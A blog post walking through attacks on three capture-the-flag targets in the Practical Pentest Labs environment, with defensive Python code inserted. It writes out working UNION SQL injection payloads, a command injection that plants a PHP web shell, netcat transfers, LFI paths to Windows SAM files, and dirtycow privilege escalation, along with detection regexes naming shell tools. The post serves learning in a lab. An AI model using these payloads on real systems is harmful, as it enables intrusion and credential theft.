Hey all,
Just an FYI: this is more or less a placeholder post with little content until I upload a walk-through.
While surfing reddit/netsec I came across a link to a walk-through of some targets in a virtual pentest lab called practicalpentestlabs, so naturally I decided to give it a go.
To join the game, it’s as simple as registering and establishing a VPN session into the lab environment via openvpn. Target IP addresses are provided and, depending on the difficulty, a little hint pointing at potential avenues of attack. The goal is to hack into each of the targets and grab the contents of secret.txt, which usually resides in /root or on the administrator’s desktop. The contents of secret.txt can then be submitted for points; the amount awarded is based on the difficulty of the target. Accumulated points are tracked on a pretty slick dashboard … sorry I couldn’t help myself :S
At the moment, I’ve worked through the web application and scenario-based targets with the exception of “X”. I thought the targets were challenging but not insanely difficult. Practical Pentest Labs gives a good tour of various vulnerabilities without obscuring them to the point where it’s less an exploitation exercise and more a game of hide and seek.
What to Expect
Enumeration is pretty straightforward; Practical Pentest Labs isn’t trying to obscure the vulnerabilities. Usually you might have to look in robots.txt or perform a bit more enumeration, but that additional piece of information shouldn’t be overly difficult to find; just try a little bit harder.
Exploitation is a bit more difficult. I found that reverse shells were not possible due to what I expect was egress filtering. Mind you, maybe I should have followed my previous post and performed a bit of egress enumeration. In addition to not being able to establish a reverse shell, I found that netcat on several of the targets did not support the -e switch, adding an extra twist. In the end it wasn’t a big deal, as for several of the targets I was able to upload files via a web page or just pipe them over with netcat.
I made a rough list of the exploited vulnerabilities, as follows:
- SQLi
- LFI
- Bruteforcing
- MySQL UDF
- Getting shells in various manners (access.log, ssh auth_keys, etc.)
- Buffer overflows
- Password reuse
- Pass the hash
- Excessive file permissions
- Privilege escalation
All in all, a pretty decent list.
C3PO – 10.0.1.6
The web page is in another language, but the vulnerabilities are pretty overt. Clicking the home link screams LFI: http://10.0.1.6/?box=./inc/index_box_nologin.php
Vyhledavani is vulnerable to error-based SQLi, but I ended up registering (registrace) an account and injecting into slozka.php on the authenticated pages: http://10.0.1.6/inc/slozka.php?slozka=in&iduser=26.
- List databases
  - iduser=27-26%20UNION%20SELECT%201,2,3,database%28%29,5,6;--
- List tables
  - iduser=27-26 UNION SELECT 1,2,table_schema,table_name,5,6 FROM information_schema.tables where table_schema = 'vuln';--
- List columns
  - iduser=27-26%20UNION%20SELECT%201,table_schema,table_name,column_name,5,6%20FROM%20information_schema.columns%20where%20table_schema%20=%20%27vuln%27;--
- List users and passwords
  - iduser=27-26%20UNION%20SELECT%201,login,heslo,4,5,6%20FROM%20vuln.users;--
The passwords are MD5 hashes; a quick stop at your favourite online hash database will give you the credentials for the admin account: username admin / password pass123.
Log in with the admin account and a new menu option is available: Sprava. The Sprava page will ping hosts on your behalf … how nice of them. Unfortunately, the command is vulnerable to command injection.
From here we can upload a simple PHP web shell. Note that $ had to be escaped as \$.
192.168.1.1; echo "<?php print 'hello'; if(isset(\$_REQUEST['cmd'])){ echo '<pre>'; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo '</pre>'; die;}" > /var/www/html/cpl.php
If all goes well, cpl.php will be accessible at http://10.0.1.6/cpl.php and you should see hello on the screen. I then started moving over the files needed to create a bind shell and to escalate privileges.
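The Sprava bug is the classic shell-string build: the host field is pasted into a command line, so ; starts a second command. As an added example (my own code, not the lab’s PHP or anything from the post), this is the shape the handler should have: parse the field as an IP address and hand ping an argv list so no shell ever sees the input. Function names are mine.

```python
import ipaddress
import subprocess
from typing import List


def build_ping_argv(host: str, count: int = 1) -> List[str]:
    """Return the argv for pinging `host`, or raise ValueError.

    `host` must parse as a literal IPv4/IPv6 address. Hostnames, shell
    metacharacters and a trailing "; echo ..." are all rejected here, and
    because the result is an argv list (never a shell string) nothing
    downstream can reinterpret the value anyway.
    """
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError as exc:
        raise ValueError(f"not an IP address: {host!r}") from exc
    if addr.is_multicast or addr.is_unspecified:
        raise ValueError(f"refusing to ping {addr}")
    if not 1 <= count <= 5:
        raise ValueError("count out of range")
    ping = "ping6" if addr.version == 6 else "ping"
    return [ping, "-c", str(count), "-W", "1", str(addr)]


def is_valid_ping_target(host: str) -> bool:
    """Boolean form of the same check, for use in form validation."""
    try:
        build_ping_argv(host)
        return True
    except ValueError:
        return False


def legacy_command_string(host: str) -> str:
    """The vulnerable pattern from the post, kept only for contrast (never
    executed here): the raw field lands in a shell line unchanged."""
    return f"ping -c 1 {host}"


def ping_host(host: str, timeout: float = 10.0) -> str:
    """Run the validated ping without a shell and return its stdout."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout
```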
- Listen and pipe the privesc file into /tmp
  - http://10.0.1.6/cpl.php?cmd=nc -lvp 4444 > /tmp/40616
- Send the privesc file
  - nc 10.0.1.6 4444 < /tmp/40616
- Do the same for a bind shell executable
- Set the permissions of the executable
  - http://10.0.1.6/cpl.php?cmd=chmod 755 /tmp/cplshe9091
- Execute the bind shell executable
- Within the bind session, spawn a tty shell
  - python -c 'import pty; pty.spawn("/bin/bash")'
- Change the perms and execute your privesc executable, 40616
- Rock and roll
To privesc I used dirtycow. Note, if you are compiling it yourself, don’t forget to compile for a 32-bit architecture.
Vader – 10.0.1.13
Port 80 doesn’t have much in the way of content, but notice the web server banner: Zervit httpd 0.4, that’s different. A quick Google search turned up the following vulnerability: https://www.exploit-db.com/exploits/12582/. Using the examples in the link, boot.ini is available for download, thus proving that we have LFI. With LFI and ports 135 and 445 available, we have a perfect setup for getting the target’s hashes and then spawning a session by passing the hash.
- http://10.0.1.13/index.html?../../../../../../../../../windows/repair/sam
- http://10.0.1.13/index.html?../../../../../../../../../windows/repair/system
The SAM and SYSTEM files are there; however, we need to be mindful that these files could be out of date, so spawning a session might not be possible. Using pwdump to dump the hashes:
I played around with the administrator account, but it appears that the practicalpentestlab guys tinkered with the permissions, so Vader is your man for PtH.
Leia – 10.0.1.14
The web server root has a directory listing with two files: page.php and register.php. page.php throws a PHP include warning that a file cannot be found: potential LFI. register.php has a registration form with several POST fields and a submit button. When a single quote is put into any of the fields, a controlled error message of “Invalid Query” is displayed: potential SQL injection. Further digging revealed that the userName field, at least, is vulnerable to blind SQL injection. Like any sane person dealing with blind SQLi, I decided to use sqlmap.
sqlipost.txt is a sample capture of the POST to the registration page. Passing sqlipost.txt to sqlmap at level 3 will detect the blind SQLi vulnerability.
- sqlmap -r sqlipost.txt -p userName --level=3
Using sqlmap I was able to download /etc/passwd, but was unable to do so for page.php. Playing around with page.php, I found that the parameter name was page and that it was indeed vulnerable to LFI.
Using php://filter I downloaded register.php and found that it loads .dbcontroller.php to connect to the MySQL database. Downloading .dbcontroller.php gives the credentials for the MySQL database and, surprise, Leia used the same password.
- http://10.0.1.14/page.php?page=php://filter/convert.base64-encode/resource=register.php
- http://10.0.1.14/page.php?page=php://filter/convert.base64-encode/resource=.dbcontroller.php
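As an added example (my own code, not the lab’s or the post’s), the Python below runs the signatures a defender would want over web access logs for the request styles used against C3PO, Vader and Leia: UNION-based SQLi, php://filter LFI, ../ traversal and cmd= calls to a dropped web shell. The log lines are constructed to mirror the requests in this post, not captured from the lab, and the rule names are mine.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Apache/nginx "combined" format up to the status code; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules run against the fully URL-decoded request target.
RULES = {
    "sqli_union": re.compile(r"union\s+(all\s+)?select", re.I),
    "sqli_schema": re.compile(r"information_schema\.", re.I),
    "lfi_wrapper": re.compile(r"php://(filter|input|data)", re.I),
    "traversal": re.compile(r"(\.\./){2,}"),
    # ';' or '|' followed by a word, backticks, $( ), or a redirect to an absolute path
    "cmd_injection": re.compile(r";\s*[a-z]|\|\s*[a-z]|`|\$\(|>\s*/", re.I),
    # a cmd= parameter carrying a common binary name is a web-shell tell
    "webshell_param": re.compile(r"[?&]cmd=(nc|chmod|python|bash|sh|wget|curl)\b", re.I),
}

def decode_target(raw: str) -> str:
    """Decode twice: one layer from the client, possibly one from a proxy."""
    return unquote_plus(unquote_plus(raw))

def classify(line: str) -> Dict[str, object]:
    """Parse one log line and return the rule names it triggers."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "hits": []}
    target = decode_target(m.group("target"))
    hits = [name for name, rx in RULES.items() if rx.search(target)]
    return {"parsed": True, "ip": m.group("ip"), "target": target, "hits": hits}

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the records with at least one hit."""
    return [r for r in map(classify, lines) if r["hits"]]

# Constructed sample lines modelled on the requests in this post (not real lab logs).
SAMPLE_LOG = [
    '10.10.0.5 - - [01/Jan/2017:10:00:01 +0000] "GET /?box=./inc/index_box_nologin.php HTTP/1.1" 200 512',
    '10.10.0.5 - - [01/Jan/2017:10:00:02 +0000] "GET /inc/slozka.php?slozka=in&iduser=27-26%20UNION%20SELECT%201,2,3,database%28%29,5,6;-- HTTP/1.1" 200 900',
    '10.10.0.5 - - [01/Jan/2017:10:00:03 +0000] "GET /page.php?page=php://filter/convert.base64-encode/resource=register.php HTTP/1.1" 200 2048',
    '10.10.0.5 - - [01/Jan/2017:10:00:04 +0000] "GET /index.html?../../../../../../../../../windows/repair/sam HTTP/1.1" 200 24576',
    '10.10.0.5 - - [01/Jan/2017:10:00:05 +0000] "GET /cpl.php?cmd=nc%20-lvp%204444%20%3E%20/tmp/40616 HTTP/1.1" 200 10',
    '10.10.0.9 - - [01/Jan/2017:10:00:06 +0000] "GET /inc/slozka.php?slozka=in&iduser=26 HTTP/1.1" 200 900',
]
```

Form POST bodies (the Sprava ping field, Leia’s register.php) never reach an access log, so those need application or WAF logging, and the first sample line (the box= include) looks benign from the URL alone. Pair this with file-integrity alerts on the web root, which would catch a new cpl.php regardless of how it got there.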
SSH in as Leia, copy the dirtycow local privilege escalation exploit over with nc, get root, and go get /root/secret.txt.
“SSH in with Leia, copy the dirtycow local privilege escalation exploit with nc, get root, and go get /root/secret.txt.”
I wonder what your obsession with DirtyCow is? 🙂
It’s much easier on Leia just to sudo su 😉
No obsession, just laziness. I agree, it is much easier and more opsec friendly too, but meh.